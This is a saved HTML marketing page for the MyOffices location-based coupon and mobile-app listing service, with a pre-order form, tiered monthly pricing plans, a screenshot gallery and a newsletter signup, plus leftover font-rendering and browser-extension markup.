                  <a href="http://itunes.apple.com/ae/app/myoffices/id440348944?mt=8" class="button-white buy"><cufon class="cufon cufon-canvas" alt="get " style="width: 50px; height: 24px;"><canvas width="93" height="32" style="width: 93px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>get </cufontext></cufon><cufon class="cufon cufon-canvas" alt="it " style="width: 30px; height: 24px;"><canvas width="73" height="32" style="width: 73px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>it </cufontext></cufon><cufon class="cufon cufon-canvas" alt="now" style="width: 57px; height: 24px;"><canvas width="84" height="32" style="width: 84px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>now</cufontext></cufon></a>
                  <a href="http://itunes.apple.com/ae/app/myoffices/id440348944?mt=8" class="button-black free"><cufon class="cufon cufon-canvas" alt="free " style="width: 39px; height: 21px;"><canvas width="67" height="28" style="width: 67px; height: 28px; top: -5px; left: -5px;"></canvas><cufontext>free </cufontext></cufon><cufon class="cufon cufon-canvas" alt="on " style="width: 27px; height: 21px;"><canvas width="56" height="28" style="width: 56px; height: 28px; top: -5px; left: -5px;"></canvas><cufontext>on </cufontext></cufon><cufon class="cufon cufon-canvas" alt="the " style="width: 33px; height: 21px;"><canvas width="62" height="28" style="width: 62px; height: 28px; top: -5px; left: -5px;"></canvas><cufontext>the </cufontext></cufon><cufon class="cufon cufon-canvas" alt="App " style="width: 39px; height: 21px;"><canvas width="68" height="28" style="width: 68px; height: 28px; top: -5px; left: -5px;"></canvas><cufontext>App </cufontext></cufon><cufon class="cufon cufon-canvas" alt="Stores" style="width: 54px; height: 21px;"><canvas width="79" height="28" style="width: 79px; height: 28px; top: -5px; left: -5px;"></canvas><cufontext>Stores</cufontext></cufon></a>                 </div>
                </div>
		       </div>
               <!-- slider-show seventh end here -->
              
              <!-- slider-show more begin here ... , etc. -->
             </div>
           <!-- sliders end here -->
	      </div>
         </div>	
         <div class="slider-bottom"></div>		 
       <!-- slider-show end here -->

<!-- HEAD END --> 
 
<!-- CONTENT BEGIN -->
 
 <!-- wrapcontent begin here -->
 
  <div id="wrapcontent">
       
     <!-- content begin here -->
      
      <div class="content clearfix">
      
      <div class="grid_23">
      
      <div class="grid_13">
       <img src="/images/window.png" alt="" class="imgleft">
       <h3 class="title"><cufon class="cufon cufon-canvas" alt="Increase " style="width: 97px; height: 21px;"><canvas width="135" height="29" style="width: 135px; height: 29px; top: -5px; left: -8px;"></canvas><cufontext>Increase </cufontext></cufon><cufon class="cufon cufon-canvas" alt="Sales" style="width: 56px; height: 21px;"><canvas width="90" height="29" style="width: 90px; height: 29px; top: -5px; left: -8px;"></canvas><cufontext>Sales</cufontext></cufon></h3>
       <p>Traffic is directly correlated to sales.</p>
      </div>
      <div class="grid_13 last">
       <img src="/images/photo.png" alt="" class="imgleft">
       <h3 class="title"><cufon class="cufon cufon-canvas" alt="Powerful " style="width: 101px; height: 21px;"><canvas width="139" height="29" style="width: 139px; height: 29px; top: -5px; left: -8px;"></canvas><cufontext>Powerful </cufontext></cufon><cufon class="cufon cufon-canvas" alt="Tools " style="width: 61px; height: 21px;"><canvas width="99" height="29" style="width: 99px; height: 29px; top: -5px; left: -8px;"></canvas><cufontext>Tools </cufontext></cufon><cufon class="cufon cufon-canvas" alt="Make " style="width: 62px; height: 21px;"><canvas width="100" height="29" style="width: 100px; height: 29px; top: -5px; left: -8px;"></canvas><cufontext>Make </cufontext></cufon><cufon class="cufon cufon-canvas" alt="a " style="width: 19px; height: 21px;"><canvas width="57" height="29" style="width: 57px; height: 29px; top: -5px; left: -8px;"></canvas><cufontext>a </cufontext></cufon><cufon class="cufon cufon-canvas" alt="Difference" style="width: 110px; height: 21px;"><canvas width="141" height="29" style="width: 141px; height: 29px; top: -5px; left: -8px;"></canvas><cufontext>Difference</cufontext></cufon></h3>
       <p>With technology your company leverages their power.</p>
      </div>
      <div class="grid_13">
       <img src="/images/lab.png" alt="" class="imgleft">
       <h3 class="title"><cufon class="cufon cufon-canvas" alt="Location " style="width: 97px; height: 21px;"><canvas width="135" height="29" style="width: 135px; height: 29px; top: -5px; left: -8px;"></canvas><cufontext>Location </cufontext></cufon><cufon class="cufon cufon-canvas" alt="based " style="width: 69px; height: 21px;"><canvas width="107" height="29" style="width: 107px; height: 29px; top: -5px; left: -8px;"></canvas><cufontext>based </cufontext></cufon><cufon class="cufon cufon-canvas" alt="services" style="width: 85px; height: 21px;"><canvas width="119" height="29" style="width: 119px; height: 29px; top: -5px; left: -8px;"></canvas><cufontext>services</cufontext></cufon></h3>
       <p>We created the holy grail of business- a where you are sales system.</p>
      </div>
      <div class="grid_13 last">
       <img src="/images/gear.png" alt="" class="imgleft">
       <h3 class="title"><cufon class="cufon cufon-canvas" alt="Instant " style="width: 83px; height: 21px;"><canvas width="121" height="29" style="width: 121px; height: 29px; top: -5px; left: -8px;"></canvas><cufontext>Instant </cufontext></cufon><cufon class="cufon cufon-canvas" alt="services" style="width: 85px; height: 21px;"><canvas width="119" height="29" style="width: 119px; height: 29px; top: -5px; left: -8px;"></canvas><cufontext>services</cufontext></cufon></h3>
       <p>Get our services where - when you need it instantly.</p>
      </div>
      </div>
      <div class="grid_13 video last">
       <iframe src="http://player.vimeo.com/video/41924058?title=0&amp;byline=0&amp;portrait=0" width="268" height="200" frameborder="0"></iframe>
      </div>
      
      <!-- pre-order begin here -->
      
      <div class="grid_44 wraporder">
      
      <div id="messor" class="center" style="display: none;"></div>
      
       <h4 class="title"><cufon class="cufon cufon-canvas" alt="Pre-Order " style="width: 109px; height: 21px;"><canvas width="147" height="29" style="width: 147px; height: 29px; top: -5px; left: -8px;"></canvas><cufontext>Pre-Order </cufontext></cufon><cufon class="cufon cufon-canvas" alt="Form" style="width: 55px; height: 21px;"><canvas width="79" height="29" style="width: 79px; height: 29px; top: -5px; left: -8px;"></canvas><cufontext>Form</cufontext></cufon></h4>
       <form action="#" id="orderform" enctype="multipart/form-data" method="post"> 
          <div class="grid_13 left">
            <label for="namef">Your First Name</label>
            <input type="text" name="namef" class="inputtext req-string" id="namef" value="">
            <label for="namel">Your Last Name</label>
            <input type="text" name="namel" class="inputtext req-string" id="namel" value="">
            <label for="oremail">Your Email</label>
            <input type="text" name="oremail" class="inputtext req-email" id="oremail" value="">
            <label for="months">Pre-Payment Term Month</label>
                <select id="months" name="months">
                    <option value="1">1 month</option>
                    <option value="2">2 month</option>
                    <option value="3">3 month</option>
                    <option value="4">4 month</option>
                    <option value="5">5 month</option>
                    <option value="6">6 month</option>
                    <option value="7">7 month</option>
                    <option value="8">8 month</option>
                    <option value="9">9 month</option>
                    <option value="10">10 month</option>
                    <option value="11">11 month</option>
                    <option value="12">1 year</option>
                    <option value="24">2 year</option>
                </select>
           </div>
           
           <div class="grid_13 left">
            <label for="phone">Your Phone</label> 
            <input type="text" name="phone" class="inputtext" id="phone" value="">
            <label for="coupon">Coupon</label> 
            <input type="text" name="coupon" class="inputtext" id="coupon" value="">
            <label for="message">Message</label> 
            <textarea name="message" id="message" class="textarea req-string" cols="8" rows="12"></textarea>
           </div>
           <div class="grid_13 block_info right last">
           
            <div class="order_info">
             <h4><cufon class="cufon cufon-canvas" alt="Your " style="width: 46px; height: 18px;"><canvas width="79" height="25" style="width: 79px; height: 25px; top: -4px; left: -7px;"></canvas><cufontext>Your </cufontext></cufon><cufon class="cufon cufon-canvas" alt="Order " style="width: 57px; height: 18px;"><canvas width="90" height="25" style="width: 90px; height: 25px; top: -4px; left: -7px;"></canvas><cufontext>Order </cufontext></cufon><cufon class="cufon cufon-canvas" alt="Pack" style="width: 42px; height: 18px;"><canvas width="69" height="25" style="width: 69px; height: 25px; top: -4px; left: -7px;"></canvas><cufontext>Pack</cufontext></cufon></h4>
             <div id="order_cost"><h4><cufon class="cufon cufon-canvas" alt="$" style="width: 11px; height: 18px;"><canvas width="38" height="25" style="width: 38px; height: 25px; top: -4px; left: -7px;"></canvas><cufontext>$</cufontext></cufon><span></span><cufon class="cufon cufon-canvas" alt="&nbsp;/&nbsp;month" style="width: 79px; height: 18px;"><canvas width="105" height="25" style="width: 105px; height: 25px; top: -4px; left: -7px;"></canvas><cufontext>&nbsp;/&nbsp;month</cufontext></cufon></h4></div>
             <h3><cufon class="cufon cufon-canvas" alt="Total: " style="width: 73px; height: 24px;"><canvas width="116" height="32" style="width: 116px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>Total: </cufontext></cufon><cufon class="cufon cufon-canvas" alt="$&nbsp;" style="width: 21px; height: 24px;"><canvas width="64" height="32" style="width: 64px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>$&nbsp;</cufontext></cufon><span></span></h3>
             <p></p><strong></strong>             </div>
            
            <div class="clear"></div> 
            <a class="c-button left" href="javascript:void(0)" id="closeform">
             <span>cancel</span>            </a>
            <button id="ordersend" type="submit" class="right">send order</button>
            <span class="sending" style="display: none;">Sending...</span>           </div>
          </form>
       </div>
      <!-- pre-order end here -->
     <div class="divider"></div>
    </div>

    <!-- content end here -->
    
    
    <!-- offers begin here -->
    
      <div class="offers">
       <div class="content clearfix">
        <h2 class="left"><span class="orange"><cufon class="cufon cufon-canvas" alt="Get " style="width: 59px; height: 30px;"><canvas width="112" height="40" style="width: 112px; height: 40px; top: -7px; left: -11px;"></canvas><cufontext>Get </cufontext></cufon><cufon class="cufon cufon-canvas" alt="your " style="width: 75px; height: 30px;"><canvas width="129" height="40" style="width: 129px; height: 40px; top: -7px; left: -11px;"></canvas><cufontext>your </cufontext></cufon><cufon class="cufon cufon-canvas" alt="customized " style="width: 179px; height: 30px;"><canvas width="233" height="40" style="width: 233px; height: 40px; top: -7px; left: -11px;"></canvas><cufontext>customized </cufontext></cufon><cufon class="cufon cufon-canvas" alt="app " style="width: 64px; height: 30px;"><canvas width="118" height="40" style="width: 118px; height: 40px; top: -7px; left: -11px;"></canvas><cufontext>app </cufontext></cufon><cufon class="cufon cufon-canvas" alt="today!" style="width: 93px; height: 30px;"><canvas width="146" height="40" style="width: 146px; height: 40px; top: -7px; left: -11px;"></canvas><cufontext>today!</cufontext></cufon></span><cufon class="cufon cufon-canvas" alt=" " style="width: 9px; height: 30px;"><canvas width="62" height="40" style="width: 62px; height: 40px; top: -7px; left: -11px;"></canvas><cufontext> </cufontext></cufon><cufon class="cufon cufon-canvas" alt="Get " style="width: 59px; height: 30px;"><canvas width="112" height="40" style="width: 112px; height: 40px; top: -7px; left: -11px;"></canvas><cufontext>Get </cufontext></cufon><cufon class="cufon cufon-canvas" alt="a " style="width: 26px; height: 30px;"><canvas width="80" height="40" style="width: 80px; height: 40px; top: -7px; left: -11px;"></canvas><cufontext>a </cufontext></cufon><cufon class="cufon cufon-canvas" alt="Discount " style="width: 138px; height: 30px;"><canvas width="192" height="40" style="width: 192px; height: 40px; top: -7px; left: -11px;"></canvas><cufontext>Discount </cufontext></cufon><cufon class="cufon cufon-canvas" alt="of " style="width: 38px; height: 30px;"><canvas width="92" height="40" style="width: 92px; height: 40px; top: -7px; left: -11px;"></canvas><cufontext>of </cufontext></cufon><cufon class="cufon cufon-canvas" alt="Up " style="width: 48px; height: 30px;"><canvas width="102" height="40" style="width: 102px; height: 40px; top: -7px; left: -11px;"></canvas><cufontext>Up </cufontext></cufon><cufon class="cufon cufon-canvas" alt="to " style="width: 39px; height: 30px;"><canvas width="93" height="40" style="width: 93px; height: 40px; top: -7px; left: -11px;"></canvas><cufontext>to </cufontext></cufon><span class="orange"><cufon class="cufon cufon-canvas" alt="25%" style="width: 64px; height: 30px;"><canvas width="98" height="40" style="width: 98px; height: 40px; top: -7px; left: -11px;"></canvas><cufontext>25%</cufontext></cufon></span></h2><a href="#" class="button right last buy" id="orange"><span><cufon class="cufon cufon-canvas" alt="Only " style="width: 51px; height: 18px;"><canvas width="84" height="25" style="width: 84px; height: 25px; top: -4px; left: -7px;"></canvas><cufontext>Only </cufontext></cufon><cufon class="cufon cufon-canvas" alt="$55 " style="width: 39px; height: 18px;"><canvas width="71" height="25" style="width: 71px; height: 25px; top: -4px; left: -7px;"></canvas><cufontext>$55 </cufontext></cufon><cufon class="cufon cufon-canvas" alt="month." style="width: 73px; height: 18px;"><canvas width="106" height="25" style="width: 106px; height: 25px; top: -4px; left: -7px;"></canvas><cufontext>month.</cufontext></cufon></span></a>       </div>
      </div>
      
    <!-- offers end here -->
    
    
    <div class="heading">
         <h4 class="center"><cufon class="cufon cufon-canvas" alt="Best " style="width: 45px; height: 18px;"><canvas width="78" height="25" style="width: 78px; height: 25px; top: -4px; left: -7px;"></canvas><cufontext>Best </cufontext></cufon><cufon class="cufon cufon-canvas" alt="Price" style="width: 45px; height: 18px;"><canvas width="72" height="25" style="width: 72px; height: 25px; top: -4px; left: -7px;"></canvas><cufontext>Price</cufontext></cufon></h4>
        </div>
      
      <div class="content clearfix">
      
      <div class="grid_44">

<!-- wrapprice begin here -->
<div id="wrapprice">
 <ul id="price">
 
 <li class="out left">
 <ul class="price">
  <li class="cost"><h3><cufon class="cufon cufon-canvas" alt="Small" style="width: 67px; height: 24px;"><canvas width="109" height="32" style="width: 109px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>Small</cufontext></cufon></h3><p><cufon class="cufon cufon-canvas" alt="$3.99" style="width: 96px; height: 36px;"><canvas width="149" height="48" style="width: 149px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>$3.99</cufontext></cufon><span><cufon class="cufon cufon-canvas" alt=" " style="width: 5px; height: 14px;"><canvas width="28" height="19" style="width: 28px; height: 19px; top: -3px; left: -5px;"></canvas><cufontext> </cufontext></cufon><cufon class="cufon cufon-canvas" alt="/ " style="width: 10px; height: 14px;"><canvas width="34" height="19" style="width: 34px; height: 19px; top: -3px; left: -5px;"></canvas><cufontext>/ </cufontext></cufon><cufon class="cufon cufon-canvas" alt="mo" style="width: 23px; height: 14px;"><canvas width="42" height="19" style="width: 42px; height: 19px; top: -3px; left: -5px;"></canvas><cufontext>mo</cufontext></cufon></span></p></li>
  <li><p>DiskSpace <strong>10GB</strong></p></li>
  <li class="child"><p>Data Transfer <strong>100GB</strong></p></li>
  <li><p>Mobile App <strong>Listing</strong></p><a name="tipsy" class="plus" title="Get a free listing on the mobile app." href="javascript:void(0)"></a></li>
  <li class="child"><p>Email Accounts <strong>100</strong></p></li>
  <li><p>MySQL Data <strong>10</strong></p></li>
  <li class="buy"><a href="http://www.myofficeresources.net"><span>Buy Now</span></a></li>
 </ul>
 </li>
 
 <li class="out left">
 <ul class="price">
  <li class="cost"><h3><cufon class="cufon cufon-canvas" alt="Basic" style="width: 61px; height: 24px;"><canvas width="99" height="32" style="width: 99px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>Basic</cufontext></cufon></h3><p><cufon class="cufon cufon-canvas" alt="$15" style="width: 65px; height: 36px;"><canvas width="118" height="48" style="width: 118px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>$15</cufontext></cufon><span><cufon class="cufon cufon-canvas" alt=" " style="width: 5px; height: 14px;"><canvas width="28" height="19" style="width: 28px; height: 19px; top: -3px; left: -5px;"></canvas><cufontext> </cufontext></cufon><cufon class="cufon cufon-canvas" alt="/ " style="width: 10px; height: 14px;"><canvas width="34" height="19" style="width: 34px; height: 19px; top: -3px; left: -5px;"></canvas><cufontext>/ </cufontext></cufon><cufon class="cufon cufon-canvas" alt="mo" style="width: 23px; height: 14px;"><canvas width="42" height="19" style="width: 42px; height: 19px; top: -3px; left: -5px;"></canvas><cufontext>mo</cufontext></cufon></span></p></li>
  <li><p>DiskSpace <strong>100GB</strong></p></li>
  <li class="child"><p>Data Transfer <strong>1000GB</strong></p></li>
  <li><p>Mobile App <strong>Listing</strong></p><a name="tipsy" class="plus" title="List your app in our mobile application." href="javascript:void(0)"></a></li>
  <li class="child"><p>Email Accounts <strong>1000</strong></p></li>
  <li><p>MySQL Data <strong>25</strong></p></li>
  <li class="buy"><a href="http://www.myofficeresources.net"><span>Buy Now</span></a></li>
 </ul>
 </li>
 
 <li class="out left">
 <ul class="price best">
  <li class="orange" id="best"><h3><cufon class="cufon cufon-canvas" alt="Pro" style="width: 39px; height: 24px;"><canvas width="74" height="32" style="width: 74px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>Pro</cufontext></cufon></h3><p><cufon class="cufon cufon-canvas" alt="$25" style="width: 65px; height: 36px;"><canvas width="118" height="48" style="width: 118px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>$25</cufontext></cufon><span><cufon class="cufon cufon-canvas" alt=" " style="width: 5px; height: 14px;"><canvas width="28" height="19" style="width: 28px; height: 19px; top: -3px; left: -5px;"></canvas><cufontext> </cufontext></cufon><cufon class="cufon cufon-canvas" alt="/ " style="width: 10px; height: 14px;"><canvas width="34" height="19" style="width: 34px; height: 19px; top: -3px; left: -5px;"></canvas><cufontext>/ </cufontext></cufon><cufon class="cufon cufon-canvas" alt="mo" style="width: 23px; height: 14px;"><canvas width="42" height="19" style="width: 42px; height: 19px; top: -3px; left: -5px;"></canvas><cufontext>mo</cufontext></cufon></span></p></li>
  <li class="child"><p>Basic +<strong></strong></p></li>
  <li><p>Premium Mobile <strong>Listing</strong></p></li>
  <li class="child"><p>Coupon Listing Package <strong></strong></p><a name="tipsy" class="plus" title="List your coupon listing here and host your business also." href="javascript:void(0)"></a></li>
  <li><p>Website listing on the mobile app <strong></strong></p></li>
  <li class="child"><p>Add Coupons <strong></strong></p></li>
  <li><p>Support <strong> Free Page Design</strong></p></li>
  <li class="buy"><a href="http://www.myofficeresources.net"><span>Buy Now</span></a></li>
 </ul>
 </li>
 
 <li class="out left">
 <ul class="price">
  <li class="cost"><h3><cufon class="cufon cufon-canvas" alt="Premium" style="width: 107px; height: 24px;"><canvas width="134" height="32" style="width: 134px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>Premium</cufontext></cufon></h3><p><cufon class="cufon cufon-canvas" alt="$35" style="width: 65px; height: 36px;"><canvas width="118" height="48" style="width: 118px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>$35</cufontext></cufon><span><cufon class="cufon cufon-canvas" alt=" " style="width: 5px; height: 14px;"><canvas width="28" height="19" style="width: 28px; height: 19px; top: -3px; left: -5px;"></canvas><cufontext> </cufontext></cufon><cufon class="cufon cufon-canvas" alt="/ " style="width: 10px; height: 14px;"><canvas width="34" height="19" style="width: 34px; height: 19px; top: -3px; left: -5px;"></canvas><cufontext>/ </cufontext></cufon><cufon class="cufon cufon-canvas" alt="mo" style="width: 23px; height: 14px;"><canvas width="42" height="19" style="width: 42px; height: 19px; top: -3px; left: -5px;"></canvas><cufontext>mo</cufontext></cufon></span></p></li>
  <li><p>Pro + <strong></strong></p></li>
  <li class="child"><p>Multi Listing on our app <strong> </strong></p></li>
  <li><p>Coupon Listing<strong></strong></p><a name="tipsy" class="plus" title="This is our recommended package." href="javascript:void(0)"></a></li>
  <li class="child"><p>Banner ad development <strong> </strong></p></li>
  <li><p>E-commerce package<strong></strong></p></li>
  <li class="buy"><a href="http://www.bigmallontheweb.com"><span>Buy Now</span></a></li>
 </ul>
 </li>
 
 <li class="out left">
 <ul class="price">
  <li class="cost"><h3><cufon class="cufon cufon-canvas" alt="Ultimate" style="width: 102px; height: 24px;"><canvas width="138" height="32" style="width: 138px; height: 32px; top: -6px; left: -9px;"></canvas><cufontext>Ultimate</cufontext></cufon></h3><p><cufon class="cufon cufon-canvas" alt="$55" style="width: 65px; height: 36px;"><canvas width="118" height="48" style="width: 118px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>$55</cufontext></cufon><span><cufon class="cufon cufon-canvas" alt=" " style="width: 5px; height: 14px;"><canvas width="28" height="19" style="width: 28px; height: 19px; top: -3px; left: -5px;"></canvas><cufontext> </cufontext></cufon><cufon class="cufon cufon-canvas" alt="/ " style="width: 10px; height: 14px;"><canvas width="34" height="19" style="width: 34px; height: 19px; top: -3px; left: -5px;"></canvas><cufontext>/ </cufontext></cufon><cufon class="cufon cufon-canvas" alt="mo" style="width: 23px; height: 14px;"><canvas width="42" height="19" style="width: 42px; height: 19px; top: -3px; left: -5px;"></canvas><cufontext>mo</cufontext></cufon></span></p></li>
  <li><p>Premium Package <strong></strong></p></li>
  <li class="child"><p>Customized app with <strong>your logo</strong></p></li>
  <li><p>Get your Mobile App <strong>Here</strong></p><a name="tipsy" class="plus" title="Get a customized app for your business" href="javascript:void(0)"></a></li>
  <li class="child"><p>Open a reservation services  <strong></strong></p></li>
  <li><p>Offer coupons <strong></strong></p></li>
  <li class="buy"><a href="http://www.bigmallontheweb.com"><span>Buy Now</span></a></li>
 </ul>
 </li>
 </ul>
</div>
<!-- wrapprice end here -->
      </div>
    </div>
    
      
      <div class="heading">
         <h4 class="center"><cufon class="cufon cufon-canvas" alt="Feature " style="width: 76px; height: 18px;"><canvas width="108" height="25" style="width: 108px; height: 25px; top: -4px; left: -7px;"></canvas><cufontext>Feature </cufontext></cufon><cufon class="cufon cufon-canvas" alt="Review" style="width: 65px; height: 18px;"><canvas width="87" height="25" style="width: 87px; height: 25px; top: -4px; left: -7px;"></canvas><cufontext>Review</cufontext></cufon></h4>
        </div>
      
      <div class="content clearfix">
      
      <div class="grid_12">
      
       <!-- gallery begin here -->
       
       <div class="gallery left">
       <a href="/images/image1web.png" rel="prettyPhoto" title="Works on most smartphones">
        <img src="/images/image1web.png" alt=""><span class="zoom"></span>        </a>        </div>
      <div class="gallery left">
       <a href="/images/image2web.png" rel="prettyPhoto" title="Savings on location">
        <img src="/images/image2web.png" alt=""><span class="zoom"></span>        </a>        </div>
      <div class="gallery left last">
       <a href="/images/image3web.png" rel="prettyPhoto" title="Mobile Savings">
        <img src="/images/image3web.png" alt="" style="opacity: 1;"><span class="zoom" style="display: none; bottom: 0px;"></span>        </a>        </div>
      <div class="gallery left bottom">
       <a href="/images/image4web.png" rel="prettyPhoto" title="Location based savings">
        <img src="/images/image4web.png" alt="" style="opacity: 1;"><span class="zoom" style="display: none; bottom: 0px;"></span>        </a>        </div>
      <div class="gallery left bottom">
       <a href="/images/image5web.png" rel="Picture Perfect" title="Monetize your message">
        <img src="/images/image5web.png" alt=""><span class="zoom"></span>        </a>        </div>
      <div class="gallery left last bottom">
       <a href="/images/image6web.png" rel="prettyPhoto" title="Location is the key">
        <img src="/images/image6web.png" alt="" style="opacity: 1;">        </a>        </div>
      
      <!-- gallery end here -->
      </div>
      
      <!-- bullet begin here -->
      
      <div class="grid_12 last">
       <h4 class="description"></h4>
       <p class="header">    <%
       call WriteContents
         %>
         </p>
       <ul class="star">
        
        
        
        
       </ul>
      </div>
      
      <!-- bullet end here -->
      </div>
      
        <div class="heading">
         <h4 class="center"><cufon class="cufon cufon-canvas" alt="Feedback " style="width: 91px; height: 18px;"><canvas width="123" height="25" style="width: 123px; height: 25px; top: -4px; left: -7px;"></canvas><cufontext>Feedback </cufontext></cufon><cufon class="cufon cufon-canvas" alt="&amp; " style="width: 22px; height: 18px;"><canvas width="55" height="25" style="width: 55px; height: 25px; top: -4px; left: -7px;"></canvas><cufontext>&amp; </cufontext></cufon><cufon class="cufon cufon-canvas" alt="Tweets" style="width: 63px; height: 18px;"><canvas width="92" height="25" style="width: 92px; height: 25px; top: -4px; left: -7px;"></canvas><cufontext>Tweets</cufontext></cufon></h4>
        </div>
      
      <div class="content clearfix">
      
      
    </div>
  </div>
  
 <!-- wrapcontent end here -->

<!-- CONTENT END -->
 
<!-- FOOTER BEGIN -->

 <!-- wrapfooter begin here -->
 
  <div id="wrapfooter">
  <!-- newsletter begin here -->
   <div class="newsletter center"><a href="javascript:void(0)">Subscribe Newsletter</a></div>
   <div class="news-block">
       <div id="errormess"></div>
        <form action="#" id="newssend" method="post">
              <input class="inputtext req-email mail" type="text" name="email" id="email" onfocus="if (this.value == 'Subscribe to our news') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Subscribe to our news';}" value="Subscribe to our news">
              <button type="submit" id="submit"></button>
        </form>
        <div class="sendnews" style="display: none;">Sending...</div>
        <div id="mess" class="center" style="display: none;"></div>
   </div>
   <!-- newsletter end here -->
   
   <div class="footer clearfix">
   <span class="copy left">Copyright © 2011 www.benjamincapital.com</span>
   <ul id="socicon" class="right">
      <li><a href="http://www.facebook.com/myoffices"><img src="/images/facebook.png" alt="" style="opacity: 0.7;"></a></li>
      <li><a href="http://www.twitter.com/myoffices"><img src="/images/twitter.png" alt="" style="opacity: 0.7;"></a></li>
      <li><a href="http://www.myofficesnetwork.com"><img src="/images/linkedin.png" alt="" style="opacity: 0.7;"></a></li>
      <li><a href="http://www.myofficesnetwork.com"><img src="/images/blogger.png" alt="" style="opacity: 0.7;"></a></li>
      <li class="last"><a href="http://www.myofficesnetwork.com"><img src="/images/rss.png" alt="" style="opacity: 0.7;"></a></li>
     </ul>
    </div>
  </div>
  
 <!-- wrapfooter end here -->

<!-- FOOTER END -->
</div>

<!-- wrappage end here -->
<script type="text/javascript">Cufon.now();</script>

     <div id="fawaveSendMsgWrap" style="display: none;">         <div class="fawave-model-container">            <div class="modal-title" id="modalTitle">--FaWave</div>             <div class="close"><a href="javascript:" class="fawavemodal-close">x</a></div>             <div class="modal-data">                 <div>                    <input type="checkbox" id="fawave-share-page-chk-and-capture"><label for="fawave-share-page-chk-and-capture"></label>                    &nbsp;&nbsp;                    <input type="checkbox" id="fawave-share-page-chk"><label for="fawave-share-page-chk"></label>                    <span class="fawave-wordCount">103</span>                    <textarea id="fawaveTxtContentInp" style="width:100%;" rows="5"></textarea>                </div>                <div id="imgPreview" style="margin: 5px;"></div>                 <ul id="fawave_accountsForSend"></ul>                <div class="fawaveSubmitWarp">                    <button id="btnFawaveQuickSend" class="btn-positive" title="ctrl + enter ">                        <img src="chrome-extension://aicelmgbddfgmpieedjiggifabdpcnln/images/tick.png" alt="">！</button>                    <button class="btn-negative">                        <img src="chrome-extension://aicelmgbddfgmpieedjiggifabdpcnln/images/cross.png" alt=""></button>                    <span class="fawaveQuickSendTip"></span>                </div>                <span class="fawaveUserInfo" style="display: inline;">                    <span></span>                    <a target="_blank" href="http://weibo.com/luolinxuan"><img src="http://tp2.sinaimg.cn/1807598053/50/5614828565/0"></a><img class="blogType" src="chrome-extension://aicelmgbddfgmpieedjiggifabdpcnln/images/blogs/tsina_16.png">                </span>            </div>             <div class="fawaveInfoMsg"></div>            <iframe scr="about:blank" style="position:absolute;z-index:-1;top:0;left:0;height:100%;width:100%;" width="420" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no" allowtransparency="yes"></iframe>        </div>    </div></body></html>